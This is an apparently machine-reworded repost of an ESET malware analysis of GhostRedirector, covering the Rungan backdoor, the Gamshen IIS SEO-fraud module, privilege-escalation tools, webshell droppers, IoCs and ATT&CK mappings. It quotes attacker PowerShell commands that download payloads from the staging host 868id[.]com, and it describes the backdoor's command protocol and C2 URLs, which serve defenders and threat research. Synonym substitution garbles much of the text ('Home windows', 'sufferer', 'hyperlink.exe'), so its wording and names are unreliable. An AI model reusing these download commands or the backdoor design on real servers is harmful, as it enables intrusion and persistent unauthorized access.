[ad_1]
ESET researchers have recognized a brand new risk actor, whom now we have named GhostRedirector, that compromised not less than 65 Home windows servers primarily in Brazil, Thailand, and Vietnam. GhostRedirector used two beforehand undocumented, customized instruments: a passive C++ backdoor that we named Rungan, and a malicious Web Info Companies (IIS) module that we named Gamshen.
Whereas Rungan has the potential of executing instructions on a compromised server, the aim of Gamshen is to supply search engine optimisation fraud as-a-service, i.e., to govern search engine outcomes, boosting the web page rating of a configured goal web site. Regardless that Gamshen solely modifies the response when the request comes from Googlebot – i.e., it doesn’t serve malicious content material or in any other case have an effect on common guests of the web sites – participation within the search engine optimisation fraud scheme can damage the compromised host web site status by associating it with shady search engine optimisation methods and the boosted web sites.
Apparently, Gamshen is applied as a local IIS module – IIS (Web Info Companies) is Microsoft’s Home windows internet server software program, which has a modular structure supporting two kinds of extensions: native (C++ DLL) and managed (.NET meeting). There are several types of malware that may abuse this expertise; our 2021 white paper Anatomy of native IIS malware supplies a deep perception into the kinds of native IIS threats and their structure. Gamshen falls beneath the class of a trojan with the primary objective of facilitating search engine optimisation fraud, just like IISerpent, which we documented beforehand.
Moreover Rungan and Gamshen, GhostRedirector additionally makes use of a sequence of different customized instruments, in addition to the publicly recognized exploits EfsPotato and BadPotato, to create a privileged person on the server that can be utilized to obtain and execute different malicious elements with increased privileges, or used as a fallback in case the Rungan backdoor or different malicious instruments are faraway from the compromised server. We imagine with medium confidence {that a} China-aligned risk actor was behind these assaults. On this blogpost we offer perception into the GhostRedirector arsenal used to compromise its victims.
Key factors of this blogpost:
We noticed not less than 65 Home windows servers compromised in June 2025.
Victims are primarily situated in Brazil, Thailand, and Vietnam.
Victims should not associated to at least one particular sector however to a range akin to insurance coverage, healthcare, retail, transportation, expertise, and schooling.
GhostRedirector has developed a brand new C++ backdoor, Rungan, able to executing instructions on the sufferer’s server.
GhostRedirector has developed a malicious native IIS module, Gamshen, that may carry out search engine optimisation fraud; we imagine its goal is to artificially promote numerous playing web sites.
GhostRedirector depends on public exploits akin to BadPotato or EfsPotato for privilege escalation on compromised servers.
Primarily based on numerous elements, we conclude with medium confidence {that a} beforehand unknown, China-aligned risk actor was behind these assaults. We’ve got named it GhostRedirector.
Attribution
We haven’t been in a position to attribute this assault to any recognized group; thus we coined the brand new title GhostRedirector, to cluster all actions documented on this blogpost. These actions began in December of 2024, however we had been in a position to uncover different associated samples that lead us imagine that GhostRedirector has been lively since not less than August 2024.
GhostRedirector has an arsenal that features the passive C++ backdoor Rungan, the malicious IIS trojan Gamshen, and quite a lot of different utilities. We’ve got clustered these instruments collectively by:
their presence on the identical compromised server throughout the similar timeframe,
a shared staging server, and
similarities within the PDB paths of varied GhostRedirector instruments, as defined beneath.
We imagine with medium confidence that GhostRedirector is a China-aligned risk actor, based mostly on the next elements:
a number of samples of GhostRedirector instruments have hardcoded Chinese language strings,
a code-signing certificates issued to a Chinese language firm was used within the assault, and
one of many passwords for GhostRedirector-created customers on the compromised server accommodates the phrase huang, which is Chinese language for yellow.
GhostRedirector isn’t the primary recognized case of a China-aligned risk actor partaking in search engine optimisation fraud by way of malicious IIS modules. Final yr, Cisco Talos printed a blogpost a couple of China-aligned risk actor known as DragonRank that conducts search engine optimisation fraud. There’s some overlap within the sufferer geolocation (Thailand, India, and the Netherlands) and sectors (healthcare, transportation, and IT) in each assaults. Nonetheless, it’s doubtless that these had been opportunistic assaults, exploiting as many susceptible servers as attainable, fairly than focusing on a selected set of entities. Moreover these similarities, we don’t have any motive to imagine that DragonRank and GhostRedirector are linked, so we monitor these actions individually.
Victimology
Determine 1 reveals a heatmap of the affected international locations, combining knowledge from two sources:
ESET telemetry, the place we detected these assaults between December 2024 and April 2025, and
our internet-wide scan from June 2025 that we ran to get a greater understanding of the size of the assault, and that allowed us to determine further victims.
We notified all of the victims that we recognized via our web scan concerning the compromise.
Determine 1. Nations the place victims had been detected
With all of the collected data, we discovered that not less than 65 Home windows servers had been compromised worldwide. A lot of the affected servers are in Brazil, Peru, Thailand, Vietnam, and the USA. Notice that many of the compromised servers situated within the USA seem to have been rented to firms which might be based mostly in international locations from the earlier checklist. We imagine that GhostRedirector was extra concerned with focusing on victims in South America and South Asia.
Additionally, we noticed a small variety of circumstances in:
Canada,
Finland,
India,
the Netherlands,
the Philippines, and
Singapore.
GhostRedirector doesn’t appear to be concerned with a selected vertical or sector; now we have seen victims in sectors akin to schooling, healthcare, insurance coverage, transportation, expertise, and retail.
Preliminary entry
Primarily based on ESET telemetry, we imagine that GhostRedirector positive aspects preliminary entry to its victims by exploiting a vulnerability, most likely an SQL Injection. Then it makes use of PowerShell to obtain numerous malicious instruments – all from the identical staging server, 868id[.]com. In some circumstances, now we have seen the attackers leveraging a special LOLBin, CertUtil, for a similar goal.
This conjecture is supported by our commentary that the majority unauthorized PowerShell executions originated from the binary sqlserver.exe, which holds a saved process xp_cmdshell that can be utilized to execute instructions on a machine.
The next are examples of instructions that we detected being executed on the compromised servers:
cmd.exe /d /s /c ” powershell curl https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile C:ProgramDataEfsNetAutoUser_br.exe”
cmd.exe /d /s /c ” powershell curl http://xz.868id[.]com/EfsPotato_sign.exe -OutFile C:ProgramDataEfsPotato_sign.exe”
cmd.exe /d /s /c “powershell curl https://xzs.868id[.]com/hyperlink.exe -OutFile C:ProgramDatalink.exe”
powershell curl https://xzs.868id[.]com/iis/br/ManagedEngine64_v2.dll -OutFile C:ProgramDataMicrosoftDRMlogManagedEngine64.dll
powershell curl https://xzs.868id[.]com/iis/IISAgentDLL.dll -OutFile C:ProgramDataMicrosoftDRMlogminiscreen.dll
We additionally encountered that GhostRedirector put in GoToHTTP on the compromised internet server, after downloading it from the identical staging server. GoToHTTP is a benign software that enables establishing a distant connection that may be accessed from a browser.
GhostRedirector used the listing C:ProgramData to put in its malware, notably for the C++ backdoor and the IIS trojan they use the listing C:ProgramDataMicrosoftDRMlog.
Assault overview
An summary of the assault is proven in Determine 2. Attackers compromise a Home windows server, obtain and execute numerous malicious instruments: a privilege escalation software, malware that drops a number of webshells, the passive C++ backdoor Rungan, or the IIS trojan Gamshen. The aim of the privilege escalation instruments is to create a privileged person within the Directors group, so GhostRedirector can then leverage this account to execute privileged operations, or as a fallback in case the group loses entry to the compromised server.
Determine 2. Assault overview
Pernicious Potatoes performing privilege escalation
As a part of its arsenal, GhostRedirector created a number of instruments that leverage the native privilege escalation (LPE) tactic, doubtless based mostly on public EfsPotato and BadPotato exploits. Nearly all the analyzed samples had been obfuscated with .NET Reactor, with a number of layers of obfuscation. Among the samples had been validly signed with a code-signing certificates issued by TrustAsia RSA Code Signing CA G3, to 深圳市迪元素科技有限公司 (Shenzhen Diyuan Know-how Co., Ltd.), and with a thumbprint of BE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C.
The primary objective of those samples was to create or modify a person account on the compromised server and add it to the Directors group.
Throughout our evaluation, we extracted from the analyzed samples the next usernames that had been used within the creation of those malicious administrator customers.
MysqlServiceEx
MysqlServiceEx2
Admin
Determine 3 reveals the decompiled code utilized by these samples to create a person after profitable LPE exploitation. The password has been redacted for safety functions.
Determine 3. Portion of decompiled code that creates a brand new person on a sufferer server
As seen in Determine 3, these privilege escalation instruments use a customized C# class named CUserHelper. This class is applied in a DLL named Widespread.International.DLL (SHA-1: 049C343A9DAAF3A93756562ED73375082192F5A8), which we named Comdai and that was embedded within the analyzed samples. We imagine that Comdai was created by the identical builders as the remainder of the GhostRedirector arsenal, based mostly on the shared sample of their respective PDB paths – see the repeated x5 substring as proven in Desk 1, which is shared between Rungan, Gamshen, and the privilege escalation instruments.
Desk 1. PDB strings collected from GhostRedirector instruments
Pattern SHA1
Pattern sort
PDBs
049C343A9DAAF3A93756562ED73375082192F5A8
Comdai library
F:x5netToolsoMainCommon.GlobalobjReleaseCommon.International.pdb
28140A5A29EBA098BC6215DDAC8E56EACBB29B69
Rungan, C++ backdoor
F:x5AvoidRandomKill-mainx64ReleaseIISAgentDLL.pdb
871A4DF66A8BAC3E640B2D1C0AFC075BB3761954
Gamshen, IIS trojan
F:x5AvoidRandomKill-mainReleaseManagedEngine64.pdb
371818BDC20669DF3CA44BE758200872D583A3B8
Device to create a brand new person
E:x5netToolsWinSystemobjReleaseuedit32_sign.pdb
Desk 2 supplies an summary of the essential courses applied in Comdai which might be utilized by GhostRedirector’s numerous privilege escalation instruments, together with the outline of the category habits. Notice the ExeHelper class, which supplies a perform to execute a file named hyperlink.exe – GhostRedirector used the identical filename to deploy the GoToHTTP software.
Additionally word the backdoor-like capabilities, together with community communication, file execution, listing itemizing, and manipulating providers and Home windows registry keys. Whereas we haven’t noticed these strategies being utilized by any recognized GhostRedirector elements, this reveals that Comdai is a flexible software that may assist numerous levels of the assault.
Desk 2. Lessons applied in Comdai
C# class
Description
AES
Encrypts/Decrypts AES in ECB mode.Key: 030201090405060708091011121315
CUserHelper
Lists customers on a compromised server.Creates a person with specified credentials and provides it into a gaggle title additionally specified by an argument; by default it makes use of the Directors group.
ExeHelper
Used to execute a binary named hyperlink.exe. This title was utilized by the attackers for the GoToHTTP binary.
HttpHelper
Can carry out via completely different strategies, GET and POST requests, with an unknown goal, to a hardcoded URL – https://www.cs01[.]store.
MsgData
Accommodates solely attributes, utilized by the category NodejsTX to deserialize a JSON object.
MyDll
Invokes strategies from an unknown DLL named MyDLL.dll.
NodejsTX
Gives a technique to speak with one other malicious part by way of pipes; the pipe is called salamander_pipe, which might obtain parameters to create a specified person who’s then added to the directors group. This person creation is achieved by invoking a technique from the CUserHelper class.
RegeditHelper
Accommodates a technique for studying the worth of a specified home windows registry key.
ScanfDirectory
Accommodates strategies for itemizing the contents of a specified listing.
ServiceHelper
Accommodates strategies to restart a specified service.
SystemHelper
Accommodates strategies to execute a binary or execute instructions by way of ProcessStartInfo class. The binary or instructions are offered to ProcessStartInfo as arguments.
UserStruct
Accommodates solely attributes, username – stringGroups – checklist<string>Attributes are utilized by class CUserHelper for itemizing customers.
Some exceptions to the rule
We found a pattern (SHA-1: 21E877AB2430B72E3DB12881D878F78E0989BB7F) utilizing the identical certificates, uploaded to VirusTotal in August 2024, which we imagine is said to GhostRedirector’s arsenal, though we didn’t see it used throughout this marketing campaign. This assumption is predicated on the habits of the pattern, which tries to open a textual content file and ship its contents to a hardcoded URL. For this, the pattern accommodates an embedded Comdai DLL and it invokes the Comdai C# class HttpHelper, which has a hardcoded URL that’s https://www.cs01[.]store – the identical area talked about in Desk 2.
We additionally found some privilege escalation instruments that differ a bit of from the habits talked about beforehand.
For instance, in a single case (SHA-1: 5A01981D3F31AF47614E51E6C216BED70D921D60), as an alternative of making a brand new person, it modifications the password of an present person Visitor for one hardcoded within the malware after which, utilizing the RID hijacking approach, it makes an attempt so as to add this person to the administrator teams.
In one other case (SHA-1: 9DD282184DDFA796204C1D90A46CAA117F46C8E1), the software not solely creates a brand new administrator person but in addition installs a number of webshells on a selected path within the sufferer’s servers, offered manually by GhostRedirector as an argument to the software.
These webshells are embedded within the sources of the pattern in cleartext, and the names are hardcoded; the names we noticed used are:
C1.php
Cmd.aspx
Error.aspx
K32.asxp
K64.aspx
LandGrey.asp
Zunput, an internet site data collector plus webshell dropper
One other attention-grabbing software utilized by GhostRedirector had the filename SitePuts.exe. This pattern (SHA‑1: EE22BA5453ED577F8664CA390EB311D067E47786), which we named Zunput, can also be developed with the .NET Framework and signed with the certificates talked about above; it reads the IIS configuration system in search of configured web sites and obtains the next details about them:
bodily path on the server,
title, and
for every web site, the next attributes:
○ protocol
○ IP handle, and
○ hostname
As soon as the data is collected, Zunput checks for the existence of the bodily path on the server, and in addition verifies that the listing accommodates not less than one file with the .php, .aspx, or .asp extension. This fashion, Zunput solely targets lively web sites able to executing dynamic content material – solely in these directories does it then drop the embedded webshells. Webshells are embedded within the sources of the pattern and for the dates of every webshell (creation, modified, accessed), the malware makes use of the date of an present file from the listing.
Webshells are written in ASP, PHP, and JavaScript, and the names used are chosen randomly from the next checklist:
Xml
Ajax
Sync
Loadapi
Loadhelp
Code
Jsload
Loadcss
Loadjs
Pop3
Imap
Api
Extensions used for the webshells:
Info collected throughout Zunput execution is saved in a file named log.txt (see an instance in Determine 4) within the listing from which it was executed. This data isn’t exfiltrated mechanically by Zunput, however it may be obtained by the attackers via a number of strategies; one could be by way of the deployed webshell talked about earlier than.
Determine 4. Instance of saved content material of log.txt the place 分割线 machine interprets to Dividing line
The ultimate payloads
Rungan, a passive C++ backdoor
Rungan (SHA-1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69) is a passive C/C++ backdoor that now we have seen put in in C:ProgramDataMicrosoftDRMlogminiscreen.dll.
This backdoor makes use of AES in CBC mode for string decryption. 030201090405060708090A0B0C0D0E0F is used for the IV and key, and based mostly on the malware’s PDB path F:x5AvoidRandomKill-mainx64ReleaseIISAgentDLL.pdb, we imagine that GhostRedirector reuses the AES implementation from the AvoidRandomKill repository.
The primary performance of this backdoor is to register a plaintext hardcoded URL http://+:80/v1.0/8888/sys.html into the compromised server, bypassing IIS by abusing the HTTP Server API. Then the backdoor waits for a request that matches that URL, then parses and executes the acquired instructions on the compromised server.
Extra URLs could be set in an non-compulsory configuration file named C:WindowsMicrosoft.NETFramework64v2.0.507271033vbskui.dll. Rungan will hearken to all incoming requests matching the configured patterns, and the configuration could be up to date by way of a backdoor command. To activate the backdoor, any incoming HTTP request should comprise a selected mixture of parameters and values, that are hardcoded in Rungan.
As soon as this examine is met, Rungan makes use of the parameter motion to find out the backdoor command, and makes use of the information within the HTTP request physique because the command parameters. No encryption or encoding is used within the C&C protocol. Probably the most notable capabilities are creating a brand new person or executing instructions on the sufferer’s server; a full checklist of backdoor instructions is proven in Desk 3.
Desk 3.Rungan backdoors instructions
Parameter
Physique
Description
Response
mkuser
person=<USERNAME>&pwd=<PASSWORD>&groupname=<GROUPNAME>
Creates the required person on the compromised server utilizing the NetUserAdd Home windows API.
Standing code of the operation.
listfolder
path=<A_PATH>
This appears unfinished: it collects data from chosen path however doesn’t exfiltrate it.
N/A
addurl
url=<URL_1>|<URL_2>
Registers URLs the backdoor will pay attention on. Might be a couple of separated with |. The URL can also be added to the configuration file.
If a URL fails to register, the response will likely be Failed: <URL>, in any other case All Okay.
cmd
cmdpath=<CMD_PATH>&mingl=<COMMAND_TO_EXECUTE>
Executes a command on the sufferer’s server utilizing pipes and the CreatePorcessA API.
Command output.
Determine 5 and Determine 6 present completely different examples of requests made to the malware throughout a dynamic evaluation utilizing the software postman in a simulated surroundings.
Determine 5. Executing instructions on a testing server
Determine 6. Including a person via the malware on a testing server
Gamshen, malicious IIS module
Developed as a C/C++ DLL, Gamshen is a malicious native IIS module. The primary performance of this malware is to intercept requests made to the compromised server from the Googlebot search engine crawler and solely in that case modify the reliable response of the server. The response is modified based mostly on knowledge requested dynamically from Gamshen’s C&C server. By doing this, GhostRedirector makes an attempt to govern the Google search rating of a selected, third-party web site, by utilizing manipulative, shady search engine optimisation methods akin to creating synthetic backlinks from the reliable, compromised web site to the goal web site. We beforehand documented a case of an IIS trojan utilizing related ways: see IISerpent: Malware-driven search engine optimisation fraud as a service.
It is essential to say {that a} common person who visits the affected web site wouldn’t see any modifications and wouldn’t be affected by the malicious habits as a result of Gamshen doesn’t set off any of its malicious exercise on requests from common guests.
Determine 7 reveals how a malicious module taking part within the IIS search engine optimisation fraud scheme modifies the reliable response of a compromised server when a request is constituted of the Google Crawler, aka Googlebot.
Determine 7. Overview of an search engine optimisation fraud scheme
With a purpose to do that, the attackers have applied their very own malicious code for the next IIS occasion handlers:
OnBeginRequest
OnPreExecuteRequestHandler
OnPostExecuteRequestHandler
OnSendResponse
When the compromised server receives an HTTP request, the request goes via the IIS request processing pipeline, which triggers these handlers in numerous steps of the method – notably, the OnSendResponse handler is triggered simply earlier than the HTTP response is distributed out by the compromised server. Since Gamshen is put in as an IIS module, it mechanically intercepts every incoming HTTP request at these steps, and performs three actions.
First, it performs a sequence of validations to filter solely HTTP requests of curiosity:
The request should originate from a Google crawler: both the Consumer-Agent header accommodates the string Googlebot, or the Referer accommodates the string google.com.
The HTTP methodology should not be POST.
The requested useful resource isn’t a picture, stylesheet, or related static useful resource, i.e., it doesn’t have any of the next extensions: .jpg, .resx, .png, .jpeg, .bmp, .gif, .ico, .css, or .js. That is more likely to keep away from breaking UI performance.
The URL should comprise the string android_ or match any of the next common expressions:
○ [/]?(android|performs|articles|particulars|iosapp|topnews|joga)_([0-9_]{6,20})(/|.w+)?
○ [/]?(android|performs|articles|particulars|iosapp|topnews|joga)_([a-zA-Z0-9_]{6,8})/([a-zA-Z0-9_]{6,20})(/|.w+)?
○ [/]?(android|performs|articles|particulars|iosapp|topnews|joga)/([0-9_]{6,20})(/|.w+)?
○ [/]?(android|performs|articles|particulars|iosapp|topnews|joga)/([a-zA-Z]{8,10})(/|.w+)?
○ [/]?([a-zA-Z0-9]{6,8})/([a-zA-Z0-9]{6,8})(/|.phtml|.xhtml|.phtm|.shtml)
○ [/]?([a-zA-Z0-9_]{14})(/|.html|.htm)
○ [/]?([a-zA-Z0-9]{6})/([a-zA-Z0-9]{8})(/|.html|.htm)
○ [/]?([a-z0-9]{6}).xhtml
Second, Gamshen modifies the response meant for the search engine crawler with knowledge obtained from its personal C&C server, brproxy.868id[.]com. We’ve got noticed three URLs getting used for this goal:
https://brproxy.868id[.]com/index_base64.php?<ORIGINAL_URL>
https://brproxy.868id[.]com/tz_base64.php?<ORIGINAL_URL>
https://brproxy.868id[.]com/url/index_base64.php
In all circumstances, the next hardcoded Consumer-Agent string is used: Mozilla/5.0 (suitable; Googlebot/2.1; +http://www.google.com/bot.html). A base64-encoded response is predicted, which is then decoded and injected into the HTTP response meant for the search engine crawler.
Lastly, on the final step of the request processing pipeline, simply earlier than the HTTP response is distributed out – the OnSendResponse occasion handler verifies the response for these crawler requests. If the response has the 404 HTTP standing code – i.e., Gamshen had not been in a position to get hold of the malicious knowledge from its C&C server, then it as an alternative performs a redirect to a special C&C server: http://gobr.868id[.]com/tz.php.
We weren’t in a position to get hold of a response from brproxy.868id[.]com or gobr.868id[.]com, however imagine the information helps shady search engine optimisation methods – akin to key phrase stuffing, inserting malicious backlinks – or, in case of the redirection, making the search engine affiliate the compromised web site with the goal, third-party web site, thus poisoning the search index.
We had been, nevertheless, in a position to pivot on these domains on VirusTotal and discover associated photographs – on this case, photographs promoting a playing utility for Portuguese talking customers. We imagine this web site is the beneficiary of the search engine optimisation fraud scheme, facilitated by this malicious IIS module – Gamshen most likely makes an attempt to compromise as many web sites as attainable and misuse their status to drive visitors to this third-party web site.
Determine 8 and Determine 9 present two photographs probably utilized by GhostRedirector in its search engine optimisation fraud scheme.
Determine 8. A playing web site doubtless benefiting from the search engine optimisation fraud scheme (machine translation: Advantages and privileges for VIP members)
Determine 9. A playing web site doubtless benefiting from the search engine optimisation fraud scheme (machine translation: Giant deposits and withdrawals with out worries)
Conclusion
On this blogpost, now we have introduced a beforehand unknown, China-aligned risk actor, GhostRedirector, and its toolkit for compromising and abusing Home windows servers. Along with enabling distant command execution on the compromised servers, GhostRedirector additionally deploys a malicious IIS module, Gamshen, designed to govern Google search outcomes via shady search engine optimisation ways. Gamshen abuses the credibility of the web sites hosted on the compromised server to advertise a third-party, playing web site – probably a paying shopper taking part in an search engine optimisation fraud as-a-service scheme.
GhostRedirector additionally demonstrates persistence and operational resilience by deploying a number of distant entry instruments on the compromised server, on prime of making rogue person accounts, all to take care of long-term entry to the compromised infrastructure.
Mitigation suggestions could be present in our complete white paper. For any inquiries, or to make pattern submissions associated to the topic, contact us at threatintel@eset.com.
IoCs
A complete checklist of indicators of compromise (IoCs) and samples could be present in our GitHub repository.
Recordsdata
SHA-1
Filename
Detection
Description
EE22BA5453ED577F8664CA390EB311D067E47786
SitePut.exe
MSIL/Agent.FEZ
Zunput, data collector and webshell installer.
677B3F9D780BE184528DE5967936693584D9769A
EfsNetAutoUser.exe
MSIL/HackTool.Agent.QJ
A customized software utilizing the EfsPotato exploit to create a brand new person on the compromised server.
5D4D7C96A9E302053BDFAF2449F9A2AB3C806E63
NetAutoUser.exe
MSIL/AddUser.S
A customized software utilizing the BadPotato exploit to create a brand new person on the compromised server.
28140A5A29EBA098BC6215DDAC8E56EACBB29B69
miniscreen.dll
Win64/Agent.ELA
Rungan, a passive C++ backdoor.
371818BDC20669DF3CA44BE758200872D583A3B8
auto.exe
Generik.KJWBIPC
A software to create a brand new person on the compromised server.
9DD282184DDFA796204C1D90A46CAA117F46C8E1
auto_sign.exe
MSIL/Agent.XQL
A software to create a brand new person or deploy webshells on the compromised server.
87F354EAA1A6ED5AE51C4B1A1A801B6CF818DAFC
EfsNetAutoUser.exe
MSIL/HackTool.Agent.QJ
A customized software utilizing the EfsPotato exploit to create a brand new person on the compromised server.
5A01981D3F31AF47614E51E6C216BED70D921D60
DotNet4.5.exe
MSIL/AddUser.S
Customized software utilizing BadPotato exploit to raise privileges of an present person.
6EBD7498FC3B744CED371C379BA537077DD97036
NetAUtoUser_sign.exe
MSIL/AddUser.S
Customized software utilizing BadPotato exploit to elevated privileges of an present person.
0EE926E29874324E52DE816B74B12069529BB556
hyperlink.exe
Win64/RemoteAdmin.GotoHTTP. A probably unsafe utility
GoToHTTP software.
373BD3CED51E19E88876B80225ECA65A5C01413F
N/A
PHP/Webshell.NWE
Webshell.
5CFFC4B3B96256A45FB45056AE0A9DC76329C25A
N/A
ASP/Webshell.MP
Webshell.
B017CEE02D74C92B2C65517101DC72AFA7D18F16
N/A
PHP/Webshell.OHB
Webshell.
A8EE056799BFEB709C08D0E41D9511CED5B1F19D
N/A
ASP/Webshell.UV
Webshell.
C4681F768622BD613CBF46B218CDA06F87559825
N/A
ASP/Webshell.KU
Webshell.
E69E4E5822A81F68107B933B7653C487D055C51B
N/A
ASP/Webshell.UZ
Webshell.
A3A55E4C1373E8287E4E4D5D3350AC665E1411A7
N/A
ASP/Webshell.UY
Webshell.
E6E4634CE5AFDA0688E73A2C21A2ECDABD5E155D
N/A
ASP/Webshell.UY
Webshell.
5DFC2D0858DD7E811CD19938B8C28468BE494CB6
N/A
ASP/Webshell.UX
Webshell.
08AB5CC8618FA593D2DF91900067DB464DC72B3E
ManagedEngine32_v2.dll
Win32/BadIIS.AG
Gamshen, a malicious IIS module.
871A4DF66A8BAC3E640B2D1C0AFC075BB3761954
ManagedEngine64_v2.dll
Win64/BadIIS.CY
Gamshen, a malicious IIS module.
049C343A9DAAF3A93756562ED73375082192F5A8
N/A
MSIL/Agent.FFZ
Comdai, a malicious multipurpose DLL used to create a malicious person.
Community
IP
Area
Internet hosting supplier
First seen
Particulars
N/A
xzs.868id[.]com
N/A
2024‑12‑03
GhostRedirector staging server, hosted on Cloudflare.
104.233.192[.]1
xz.868id[.]com
PEG TECH INC
2024‑12‑03
GhostRedirector staging server.
104.233.210[.]229
q.822th[.]comwww.881vn[.]com
PEG TECH INC
2023‑10‑06
GhostRedirector staging server.
N/A
gobr.868id[.]com
N/A
2024‑08‑25
Gamshen C&C server, hosted on Cloudflare.
N/A
brproxy.868id[.]com
N/A
2024‑08‑25
Gamshen C&C server, hosted on Cloudflare.
43.228.126[.]4
www.cs01[.]store
XIMBO Web Restricted
2024‑04‑01
Comdai C&C server.
103.251.112[.]11
N/A
IRT‑HK‑ANS
N/A
GhostRedirector staging server.
MITRE ATT&CK methods
This desk was constructed utilizing model 17 of the MITRE ATT&CK framework.
Tactic
ID
Identify
Description
Useful resource Growth
T1588.002
Acquire Capabilities: Device
GhostRedirector makes use of .NET Reactor to obfuscate its instruments, and used EfsPotato and BadPotato to develop customized privilege escalation instruments.
T1587.001
Develop Capabilities: Malware
GhostRedirector develops its personal malware
T1608.006
Stage Capabilities: search engine optimisation Poisoning
GhostRedirector makes use of search engine optimisation poisoning to govern search outcomes and drive visitors to a third-party web site.
T1583.001
Purchase Infrastructure: Domains
GhostRedirector makes use of malicious domains for internet hosting payloads and for its C&C servers.
T1583.004
Purchase Infrastructure: Server
GhostRedirector leverages Cloudflare on its infrastructure.
T1608.001
Stage Capabilities: Add Malware
GhostRedirector has staged Rungan and Gamshen on attacker-controlled servers.
T1608.002
Stage Capabilities: Add Device
GhostRedirector has staged numerous malicious and bonafide instruments on attacker-controlled servers.
T1588.003
Acquire Capabilities: Code Signing Certificates
GhostRedirector obtained a certificates for signing its instruments, like these for privilege escalation.
Preliminary Entry
T1190
Exploit Public-Dealing with Software
GhostRedirector exploits an unknown SQL injection vulnerability on the sufferer’s server.
Execution
T1106
Native API
GhostRedirector might use APIs akin to HttpInitialize and HttpAddUrl for registering a URL.
T1059.001
Command and Scripting Interpreter: PowerShell
GhostRedirector makes use of PowerShell interpreter to obtain malware.
T1059.003
Command and Scripting Interpreter: Home windows Command Shell
GhostRedirector can execute cmd.exe instructions to obtain malware.
T1559
Inter-Course of Communication
Comdai can create a pipe to speak and obtain data from one other course of.
Persistence
T1546
Occasion Triggered Execution
Gamshen is loaded by the IIS Employee Course of (w3wp.exe) when the IIS server receives an inbound HTTP request.
Privilege Escalation
T1134
Entry Token Manipulation
GhostRedirector can manipulate tokens to carry out a neighborhood privilege escalation.
T1112
Modify Registry
GhostRedirector can modify a Home windows registry key to carry out RID hijacking.
Protection Evasion
T1027
Obfuscated Recordsdata or Info
GhostRedirector obfuscates its native privilege escalation instruments utilizing .NET Reactor.
T1027.009
Obfuscated Recordsdata or Info: Embedded Payloads
GhostRedirector embedded webshells into its payloads like Zunput to be dropped on compromised server.
T1140
Deobfuscate/Decode Recordsdata or Info
GhostRedirector makes use of AES in CBC mode to decrypt strings within the backdoor Rungan.
Discovery
T1083
File and Listing Discovery
GhostRedirector can use Zunput to checklist listing content material on a sufferer’s server.
Command and Management
T1105
Ingress Device Switch
GhostRedirector can abuse the software certutil.exe to obtain malware.
T1219
Distant Entry Software program
GhostRedirector might use the GoToHTTP software for connecting remotely to victims.
T1071.001
Software Layer Protocol: Internet Protocols
GhostRedirector depends on HTTP to speak with the backdoor Rungan.
T1008
Fallback Channels
GhostRedirector can deploy the software GoToHTTP or create malicious customers on the compromised server to take care of entry.
Impression
T1565
Information Manipulation
GhostRedirector can modify the response of a compromised server meant for the Google crawler, in makes an attempt to affect search outcomes order.
[ad_2]